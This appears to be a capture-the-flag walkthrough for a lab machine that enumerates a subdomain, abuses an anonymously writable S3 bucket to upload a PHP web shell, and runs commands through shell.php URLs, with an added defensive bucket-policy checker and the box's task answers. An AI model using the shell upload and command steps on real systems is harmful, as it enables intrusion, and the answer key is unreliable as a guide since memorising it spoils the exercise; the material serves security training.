Scan
nmap -T4 -Pn -sVC -p- 10.129.27.183
Ports 22 and 80 are open. Browsing to port 80 at http://10.129.27.183/#contact shows a contact email whose domain is thetoppers.htb.
Following the hint, add the domain to the hosts file, then enumerate subdomains:
echo "10.129.27.183 thetoppers.htb" >> /etc/hosts
gobuster vhost -w /usr/share/wordlists/amass/subdomains-top1mil-5000.txt -u http://thetoppers.htb/ # unfortunately this wordlist did not turn up the subdomain
echo "10.129.27.183 s3.thetoppers.htb" >> /etc/hosts
The task hint itself already names s3.thetoppers.htb.
Install the AWS client
apt install awscli -y
aws configure # interactive configuration of credentials and region
Upload a shell
aws --endpoint=http://s3.thetoppers.htb s3 ls s3://thetoppers.htb # list files: index.php is here, so the bucket is the site's web root; create a PHP one-line web shell (tools such as AntSword or Godzilla would also work)
echo '' > shell.php
aws --endpoint=http://s3.thetoppers.htb s3 cp shell.php s3://thetoppers.htb # upload the file
Execute commands
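The listing and upload above succeed because the bucket grants those rights to anyone. The following checker, added here as an example and not part of the original walkthrough, evaluates an S3 bucket policy document offline and reports which risky actions (listing, writing, deleting, policy changes) are granted to anonymous principals without a Condition. The three sample policies are constructed for illustration; the function names and the RISKY_ACTIONS set are this example's own choices, not an AWS API.

```python
"""Flag S3 bucket policies that grant anonymous listing or writing.

Added example (not from the original writeup): an anonymously listable and
writable bucket that doubles as a PHP web root turns a file upload into code
execution. This checker parses a bucket policy document and reports Allow
statements that hand RISKY_ACTIONS to every caller ("*"). Statements that
carry a Condition are not counted as grants but are tallied for review.
"""
import fnmatch
import json

# Actions that let an anonymous caller enumerate or modify bucket contents.
RISKY_ACTIONS = {
    "s3:ListBucket",
    "s3:PutObject",
    "s3:DeleteObject",
    "s3:PutBucketPolicy",
}


def _as_list(value):
    """IAM allows a string or a list in most fields; normalise to a list."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _is_anonymous(principal):
    """True when the Principal element matches every caller."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        return "*" in _as_list(principal.get("AWS"))
    return False


def _matches(patterns, action):
    # IAM action names are case-insensitive and support "*" wildcards,
    # so "s3:*" or "S3:Put*" must match "s3:PutObject".
    return any(fnmatch.fnmatch(action.lower(), p.lower()) for p in patterns)


def assess_bucket_policy(policy_json):
    """Return {'anonymous_grants': sorted risky actions granted to "*",
               'conditional_statements': count of "*" Allow statements
                                         skipped because they have a Condition}.
    """
    policy = json.loads(policy_json)
    grants = set()
    conditional = 0
    for stmt in _as_list(policy.get("Statement")):
        if stmt.get("Effect") != "Allow" or not _is_anonymous(stmt.get("Principal")):
            continue
        if stmt.get("Condition"):
            conditional += 1  # needs a human to read the condition
            continue
        actions = _as_list(stmt.get("Action"))
        grants.update(a for a in RISKY_ACTIONS if _matches(actions, a))
    return {"anonymous_grants": sorted(grants), "conditional_statements": conditional}


# --- constructed sample policies (not taken from the box) -------------------
# Public static-site pattern: read-only for everyone. Acceptable for a site.
PUBLIC_READ_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Principal": "*",
                   "Action": "s3:GetObject", "Resource": "arn:aws:s3:::site/*"}],
})

# The misconfiguration this walkthrough relies on: anyone may list and write.
WRITABLE_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Principal": {"AWS": "*"},
                   "Action": ["s3:GetObject", "s3:PutObject", "s3:ListBucket"],
                   "Resource": ["arn:aws:s3:::site", "arn:aws:s3:::site/*"]}],
})

# Wildcard grant plus a conditioned statement that must be reviewed by hand.
WILDCARD_POLICY = json.dumps({
    "Version": "2012-10-17",
    "Statement": [
        {"Effect": "Allow", "Principal": "*", "Action": "s3:*",
         "Resource": "arn:aws:s3:::site/*"},
        {"Effect": "Allow", "Principal": "*", "Action": "s3:DeleteObject",
         "Resource": "arn:aws:s3:::site/*",
         "Condition": {"IpAddress": {"aws:SourceIp": "203.0.113.0/24"}}},
    ],
})

if __name__ == "__main__":
    for name, doc in [("public-read", PUBLIC_READ_POLICY),
                      ("writable", WRITABLE_POLICY),
                      ("wildcard", WILDCARD_POLICY)]:
        print(name, assess_bucket_policy(doc))
```

Run it against a policy fetched with `aws s3api get-bucket-policy --bucket <name>` (the `Policy` field of that response is the JSON string this function expects). A non-empty `anonymous_grants` list on a bucket that also serves a web root is the finding to fix first; the public-read pattern is the only anonymous grant a static site needs.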
http://thetoppers.htb/shell.php?cmd=ls
http://thetoppers.htb/shell.php?cmd=ls ../
http://thetoppers.htb/shell.php?cmd=cat ../flag.txt
-
Task 1 How many TCP ports are open?
2
-
Task 2 What is the domain of the email address provided in the "Contact" section of the website?
thetoppers.htb
-
Task 3 In the absence of a DNS server, which Linux file can we use to resolve hostnames to IP addresses in order to be able to access the websites that point to those hostnames?
/etc/hosts
-
Task 4 Which sub-domain is discovered during further enumeration?
s3.thetoppers.htb
-
Task 5 Which service is running on the discovered sub-domain?
Amazon S3
-
Task 6 Which command line utility can be used to interact with the service running on the discovered sub-domain?
awscli
-
Task 7 Which command is used to set up the AWS CLI installation?
aws configure
-
Task 8 What is the command used by the above utility to list all of the S3 buckets?
aws s3 ls
-
Task 9 This server is configured to run files written in what web scripting language?
php